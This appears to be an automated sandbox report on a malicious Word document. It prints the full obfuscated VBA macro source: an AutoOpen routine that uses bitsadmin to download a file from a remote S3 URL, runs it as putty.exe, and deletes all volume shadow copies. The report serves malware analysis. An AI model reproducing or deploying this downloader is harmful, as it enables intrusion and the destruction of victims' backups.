aBBMXFDPLCFE = eWZICHCSUGVFF(mNWIGENREYIUGMPSNK, mtfxdlgfwsxa("6269747361646d696e202f7472616e73666572206d79446f776e6c6f61644a4f6232332068747470733a2f2f73332e61702d736f7574682d312e616d617a6f6e6177732e636f6d2f616e732e766964656f2e696e7075742f7472616e73636f64655f696e7075742f70726f66696c653136313436383135373738303035") & mtfxdlgfwsxa("76773071622e706e6720") + tKTSMASYXK + mtfxdlgfwsxa("5c5c70757474") & mtfxdlgfwsxa("792e657865"), 0&, 0&, False, jPEZPVSRELZDREQJPKQC, 0&, mNWIGENREYIUGMPSNK, structStartupInfo, structProcessInformation)
If aBBMXFDPLCFE = 0 Then
Exit Sub
Else
vYBNYBMWDIOPXGQLY = nHQTKGIQSBRUKJ(structProcessInformation.nNLBYBCNSKGBCQMOMY, uRRNLDPOUTLCYKOUQNRX)
eBOIVUIXGZQX = eWZICHCSUGVFF(mNWIGENREYIUGMPSNK, tKTSMASYXK + mtfxdlgfwsxa("5c5c70") & mtfxdlgfwsxa("757474792e657865"), 0&, 0&, False, jPEZPVSRELZDREQJPKQC, 0&, mNWIGENREYIUGMPSNK, structStartupInfo, structProcessInformation)
vYBNYBMWDIOPXGQLY = nHQTKGIQSBRUKJ(structProcessInformation.nNLBYBCNSKGBCQMOMY, uRRNLDPOUTLCYKOUQNRX)
eBOIVUIXGZQX = eWZICHCSUGVFF(mNWIGENREYIUGMPSNK, mtfxdlgfwsxa("767373") & mtfxdlgfwsxa("61646d696e2064656c65746520736861646f7773202f616c6c202f7175696574"), 0&, 0&, False, jPEZPVSRELZDREQJPKQC, 0&, mNWIGENREYIUGMPSNK, structStartupInfo, structProcessInformation)
End If
End Sub
Sub iZMSNEVO()
'
'
'
Call bRGVCEDPVTEFX
End Sub
Sub AutoOpen()
'
'
'
Call bRGVCEDPVTEFX
End Sub
Private Function mtfxdlgfwsxa(ByVal gzdppyufultz As String) As String
Dim jdrmcyqidsrv As Long
For jdrmcyqidsrv = 1 To Len(gzdppyufultz) Step 2
mtfxdlgfwsxa = mtfxdlgfwsxa & Chr$(Val("&H" & Mid$(gzdppyufultz, jdrmcyqidsrv, 2)))
Next jdrmcyqidsrv
End Function
VBA File Name: ThisDocument.cls, Stream Size: 924
General
Stream Path:VBA/ThisDocument
VBA File Name:ThisDocument.cls
Stream Size:924

VBA Code Keywords

Keyword
False
VB_Exposed
Attribute
VB_Creatable
VB_Name
VB_PredeclaredId
VB_GlobalNameSpace
VB_Base
VB_Customizable
VB_TemplateDerived
"ThisDocument"
VBA Code
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Streams

Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 418
General
Stream Path:PROJECT
File Type:ASCII text, with CRLF line terminators
Stream Size:418
Entropy:5.4103027476
Base64 Encoded:True
Stream Path: PROJECTwm, File Type: data, Stream Size: 71
General
Stream Path:PROJECTwm
File Type:data
Stream Size:71
Entropy:3.34859995248
Base64 Encoded:False
Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 5101
General
Stream Path:VBA/_VBA_PROJECT
File Type:data
Stream Size:5101
Entropy:5.44767757092
Base64 Encoded:False
Stream Path: VBA/dir, File Type: data, Stream Size: 578
General
Stream Path:VBA/dir
File Type:data
Stream Size:578
Entropy:6.32985176313
Base64 Encoded:True

Network Behavior

No network behavior found

Code Manipulations

Statistics

CPU Usage


Memory Usage


High Level Behavior Distribution


System Behavior

General

Start time:11:45:40
Start date:03/03/2021
Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):false
Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Imagebase:0x13f610000
File size:1424032 bytes
MD5 hash:95C38D04597050285A18F66039EDB456
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

Disassembly

Call Graph

Graph

  • Entrypoint
  • Decryption Function
  • Executed
  • Not Executed
Call graph (image residue; recoverable nodes and edges only):
329 AutoOpen -> 136 bRGVCEDPVTEFX
325 iZMSNEVO -> 136 bRGVCEDPVTEFX
136 bRGVCEDPVTEFX (Left:1, InStr:1) -> 333 mtfxdlgfwsxa (Val:1, Len:1, Mid$:1), called 8 times

Module: NewMacros

Declaration
Line | Content
1

Attribute VB_Name = "NewMacros"

2

Option Explicit

3

#if Win64 then

4

Private Declare PtrSafe Function lYFQGPKFNCVHQPCIKI Lib "KERNEL32" Alias "GetCurrentDirectory"(ByVal jVGXVBEGDZYNGKPD as Long, ByVal iBKFPVIEFUQC as String) as Long

5

Private Declare PtrSafe Function nHQTKGIQSBRUKJ Lib "KERNEL32" Alias "WaitForSingleObject"(ByVal sBHTGKLDEYWA as Long, ByVal aKJTVBSGMCQYROMGH as Long) as Long

6

Private Declare PtrSafe Function eWZICHCSUGVFF Lib "KERNEL32" Alias "CreateProcessA"(ByVal bMIJESOVOFPXNIGW as String, ByVal bHFOSKLPRUPEXYLBLM as String, ByVal jGRYIJOIQECNZWKRWBO as LongPtr, ByVal cOZQUISIGDQOQWG as LongPtr, ByVal sBMDCJNRZMFA as Boolean, ByVal xQFYQCXKQZVW as Long, ByVal tAFLNIDKOSMPLAQ as LongPtr, ByVal rPXYQAUNQANDHLJU as String, lpStartupInfo as kXEHZUMYUDDUTSHZMQG, lpProcessInformation as lZHEGTMHAR) as Long

7

#else

8

Private Declare Function eWZICHCSUGVFF Lib "KERNEL32" Alias "CreateProcessA"(ByVal bMIJESOVOFPXNIGW as String, ByVal bHFOSKLPRUPEXYLBLM as String, ByVal jGRYIJOIQECNZWKRWBO as Long, ByVal cOZQUISIGDQOQWG as Long, ByVal sBMDCJNRZMFA as Boolean, ByVal xQFYQCXKQZVW as Long, ByVal tAFLNIDKOSMPLAQ as Long, ByVal rPXYQAUNQANDHLJU as String, lpStartupInfo as kXEHZUMYUDDUTSHZMQG, lpProcessInformation as lZHEGTMHAR) as Long

9

Private Declare Function lYFQGPKFNCVHQPCIKI Lib "KERNEL32" Alias "GetCurrentDirectoryA"(ByVal jVGXVBEGDZYNGKPD as Long, ByVal iBKFPVIEFUQC as String) as Long

10

Private Declare Function nHQTKGIQSBRUKJ Lib "KERNEL32" Alias "WaitForSingleObject"(ByVal sBHTGKLDEYWA as Long, ByVal aKJTVBSGMCQYROMGH as Long) as Long

11

#endif

12

Private Type kXEHZUMYUDDUTSHZMQG
uXDIHQSDQDSFURPU as Long
gADXEXOUMAYJAS as String
zGIDNKNRS as String
bOKVRZINWWRNBYT as String
mDRJCTPAMQBQHAAQTWK as Long
pUOXYKNLRNVUOFQF as Long
vAGEFXNZUIALBSWQZLUC as Long
pLLESESKSWWRPH as Long
eXJVYDYJMQX as Long
hCCSLJIPWBXJZFSMOBC as Long
qTQRKIHNKBFF as Long
kJPTFUFMQKIIDRNB as Long
oBPCCMYYIVLQA as Integer
hMGQMFZNPUGWHWGDDUJH as Integer
kEDLLFOYANTEMWH as Long
pJAKUAJMMK as Long
qDNZSFLJWGOZU as Long
vDFBEKYQKFLIEV as Long
End Type

32

Private Type lZHEGTMHAR
nNLBYBCNSKGBCQMOMY as Long
iFYFVDJZCMF as Long
bNUIATLRVDMAZCVWBE as Long
xCZSHOMU as Long
End Type

38

Private Const uRRNLDPOUTLCYKOUQNRX = &HFFFFFFFF

39

Private Const jPEZPVSRELZDREQJPKQC = &H8000000

40

Private Const vUXRBEFWWFVAP = 260

Executed Functions
APIs | Meta Information

Space

vUXRBEFWWFVAP

KERNEL32!GetCurrentDirectoryA

KERNEL32!GetCurrentDirectoryA(260," ")

vUXRBEFWWFVAP

Left

InStr

vbNullChar

eWZICHCSUGVFF

Part of subcall function mtfxdlgfwsxa@NewMacros: Len

Part of subcall function mtfxdlgfwsxa@NewMacros: Chr$

Part of subcall function mtfxdlgfwsxa@NewMacros: Val

Part of subcall function mtfxdlgfwsxa@NewMacros: Mid$

jPEZPVSRELZDREQJPKQC

nHQTKGIQSBRUKJ

nNLBYBCNSKGBCQMOMY

uRRNLDPOUTLCYKOUQNRX

eWZICHCSUGVFF

Part of subcall function mtfxdlgfwsxa@NewMacros: Len

Part of subcall function mtfxdlgfwsxa@NewMacros: Chr$

Part of subcall function mtfxdlgfwsxa@NewMacros: Val

Part of subcall function mtfxdlgfwsxa@NewMacros: Mid$

jPEZPVSRELZDREQJPKQC

nHQTKGIQSBRUKJ

nNLBYBCNSKGBCQMOMY

uRRNLDPOUTLCYKOUQNRX

eWZICHCSUGVFF

Part of subcall function mtfxdlgfwsxa@NewMacros: Len

Part of subcall function mtfxdlgfwsxa@NewMacros: Chr$

Part of subcall function mtfxdlgfwsxa@NewMacros: Val

Part of subcall function mtfxdlgfwsxa@NewMacros: Mid$

jPEZPVSRELZDREQJPKQC

Strings | Decrypted Strings
"6269747361646d696e202f7472616e73666572206d79446f776e6c6f61644a4f6232332068747470733a2f2f73332e61702d736f7574682d312e616d617a6f6e6177732e636f6d2f616e732e766964656f2e696e7075742f7472616e73636f64655f696e7075742f70726f66696c653136313436383135373738303035"
"767373"
Line | Instruction | Meta Information
41

Public Sub bRGVCEDPVTEFX()

42

Dim mNWIGENREYIUGMPSNK as String

executed
43

Dim structProcessInformation as lZHEGTMHAR

44

Dim structStartupInfo as kXEHZUMYUDDUTSHZMQG

45

Dim aBBMXFDPLCFE as Long

46

Dim eBOIVUIXGZQX as Long

47

Dim vYBNYBMWDIOPXGQLY as Long

48

Dim tKTSMASYXK as String

49

tKTSMASYXK = Space(vUXRBEFWWFVAP)

Space

vUXRBEFWWFVAP

50

Dim iQDBSREAJJVCDBLKAGX as Long

51

iQDBSREAJJVCDBLKAGX = lYFQGPKFNCVHQPCIKI(vUXRBEFWWFVAP, tKTSMASYXK)

KERNEL32!GetCurrentDirectoryA(260," ")

vUXRBEFWWFVAP

executed
52

tKTSMASYXK = Left(tKTSMASYXK, InStr(tKTSMASYXK, vbNullChar) - 1)

Left

InStr

vbNullChar

53

aBBMXFDPLCFE = eWZICHCSUGVFF(mNWIGENREYIUGMPSNK, mtfxdlgfwsxa("6269747361646d696e202f7472616e73666572206d79446f776e6c6f61644a4f6232332068747470733a2f2f73332e61702d736f7574682d312e616d617a6f6e6177732e636f6d2f616e732e766964656f2e696e7075742f7472616e73636f64655f696e7075742f70726f66696c653136313436383135373738303035") & mtfxdlgfwsxa("76773071622e706e6720") + tKTSMASYXK + mtfxdlgfwsxa("5c5c70757474") & mtfxdlgfwsxa("792e657865"), 0&, 0&, False, jPEZPVSRELZDREQJPKQC, 0&, mNWIGENREYIUGMPSNK, structStartupInfo, structProcessInformation)

eWZICHCSUGVFF

jPEZPVSRELZDREQJPKQC

54

If aBBMXFDPLCFE = 0 Then

55

Exit Sub

56

Else

57

vYBNYBMWDIOPXGQLY = nHQTKGIQSBRUKJ(structProcessInformation.nNLBYBCNSKGBCQMOMY, uRRNLDPOUTLCYKOUQNRX)

nHQTKGIQSBRUKJ

nNLBYBCNSKGBCQMOMY

uRRNLDPOUTLCYKOUQNRX

58

eBOIVUIXGZQX = eWZICHCSUGVFF(mNWIGENREYIUGMPSNK, tKTSMASYXK + mtfxdlgfwsxa("5c5c70") & mtfxdlgfwsxa("757474792e657865"), 0&, 0&, False, jPEZPVSRELZDREQJPKQC, 0&, mNWIGENREYIUGMPSNK, structStartupInfo, structProcessInformation)

eWZICHCSUGVFF

jPEZPVSRELZDREQJPKQC

59

vYBNYBMWDIOPXGQLY = nHQTKGIQSBRUKJ(structProcessInformation.nNLBYBCNSKGBCQMOMY, uRRNLDPOUTLCYKOUQNRX)

nHQTKGIQSBRUKJ

nNLBYBCNSKGBCQMOMY

uRRNLDPOUTLCYKOUQNRX

60

eBOIVUIXGZQX = eWZICHCSUGVFF(mNWIGENREYIUGMPSNK, mtfxdlgfwsxa("767373") & mtfxdlgfwsxa("61646d696e2064656c65746520736861646f7773202f616c6c202f7175696574"), 0&, 0&, False, jPEZPVSRELZDREQJPKQC, 0&, mNWIGENREYIUGMPSNK, structStartupInfo, structProcessInformation)

eWZICHCSUGVFF

jPEZPVSRELZDREQJPKQC

61

Endif

62

End Sub

APIs | Meta Information

Part of subcall function bRGVCEDPVTEFX@NewMacros: Space

Part of subcall function bRGVCEDPVTEFX@NewMacros: vUXRBEFWWFVAP

Part of subcall function bRGVCEDPVTEFX@NewMacros: lYFQGPKFNCVHQPCIKI

Part of subcall function bRGVCEDPVTEFX@NewMacros: vUXRBEFWWFVAP

Part of subcall function bRGVCEDPVTEFX@NewMacros: Left

Part of subcall function bRGVCEDPVTEFX@NewMacros: InStr

Part of subcall function bRGVCEDPVTEFX@NewMacros: vbNullChar

Part of subcall function bRGVCEDPVTEFX@NewMacros: eWZICHCSUGVFF

Part of subcall function bRGVCEDPVTEFX@NewMacros: jPEZPVSRELZDREQJPKQC

Part of subcall function bRGVCEDPVTEFX@NewMacros: nHQTKGIQSBRUKJ

Part of subcall function bRGVCEDPVTEFX@NewMacros: nNLBYBCNSKGBCQMOMY

Part of subcall function bRGVCEDPVTEFX@NewMacros: uRRNLDPOUTLCYKOUQNRX

Part of subcall function bRGVCEDPVTEFX@NewMacros: eWZICHCSUGVFF

Part of subcall function bRGVCEDPVTEFX@NewMacros: jPEZPVSRELZDREQJPKQC

Part of subcall function bRGVCEDPVTEFX@NewMacros: nHQTKGIQSBRUKJ

Part of subcall function bRGVCEDPVTEFX@NewMacros: nNLBYBCNSKGBCQMOMY

Part of subcall function bRGVCEDPVTEFX@NewMacros: uRRNLDPOUTLCYKOUQNRX

Part of subcall function bRGVCEDPVTEFX@NewMacros: eWZICHCSUGVFF

Part of subcall function bRGVCEDPVTEFX@NewMacros: jPEZPVSRELZDREQJPKQC

Line | Instruction | Meta Information
69

Sub AutoOpen()

73

Call bRGVCEDPVTEFX()

executed
74

End Sub

Non-Executed Functions
APIs | Meta Information

Part of subcall function bRGVCEDPVTEFX@NewMacros: Space

Part of subcall function bRGVCEDPVTEFX@NewMacros: vUXRBEFWWFVAP

Part of subcall function bRGVCEDPVTEFX@NewMacros: lYFQGPKFNCVHQPCIKI

Part of subcall function bRGVCEDPVTEFX@NewMacros: vUXRBEFWWFVAP

Part of subcall function bRGVCEDPVTEFX@NewMacros: Left

Part of subcall function bRGVCEDPVTEFX@NewMacros: InStr

Part of subcall function bRGVCEDPVTEFX@NewMacros: vbNullChar

Part of subcall function bRGVCEDPVTEFX@NewMacros: eWZICHCSUGVFF

Part of subcall function bRGVCEDPVTEFX@NewMacros: jPEZPVSRELZDREQJPKQC

Part of subcall function bRGVCEDPVTEFX@NewMacros: nHQTKGIQSBRUKJ

Part of subcall function bRGVCEDPVTEFX@NewMacros: nNLBYBCNSKGBCQMOMY

Part of subcall function bRGVCEDPVTEFX@NewMacros: uRRNLDPOUTLCYKOUQNRX

Part of subcall function bRGVCEDPVTEFX@NewMacros: eWZICHCSUGVFF

Part of subcall function bRGVCEDPVTEFX@NewMacros: jPEZPVSRELZDREQJPKQC

Part of subcall function bRGVCEDPVTEFX@NewMacros: nHQTKGIQSBRUKJ

Part of subcall function bRGVCEDPVTEFX@NewMacros: nNLBYBCNSKGBCQMOMY

Part of subcall function bRGVCEDPVTEFX@NewMacros: uRRNLDPOUTLCYKOUQNRX

Part of subcall function bRGVCEDPVTEFX@NewMacros: eWZICHCSUGVFF

Part of subcall function bRGVCEDPVTEFX@NewMacros: jPEZPVSRELZDREQJPKQC

Line | Instruction | Meta Information
63

Sub iZMSNEVO()

67

Call bRGVCEDPVTEFX()

68

End Sub

APIs | Meta Information

Len

Chr$

Val

Mid$

Line | Instruction | Meta Information
75

Private Function mtfxdlgfwsxa(ByVal gzdppyufultz as String) as String

76

Dim jdrmcyqidsrv as Long

77

For jdrmcyqidsrv = 1 To Len(gzdppyufultz) Step 2

Len

78

mtfxdlgfwsxa = mtfxdlgfwsxa & Chr$(Val("&H" & Mid$(gzdppyufultz, jdrmcyqidsrv, 2)))

Chr$

Val

Mid$

79

Next jdrmcyqidsrv

Len

80

End Function

Module: ThisDocument

Declaration
Line | Content
1

Attribute VB_Name = "ThisDocument"

2

Attribute VB_Base = "1Normal.ThisDocument"

3

Attribute VB_GlobalNameSpace = False

4

Attribute VB_Creatable = False

5

Attribute VB_PredeclaredId = True

6

Attribute VB_Exposed = True

7

Attribute VB_TemplateDerived = True

8

Attribute VB_Customizable = True
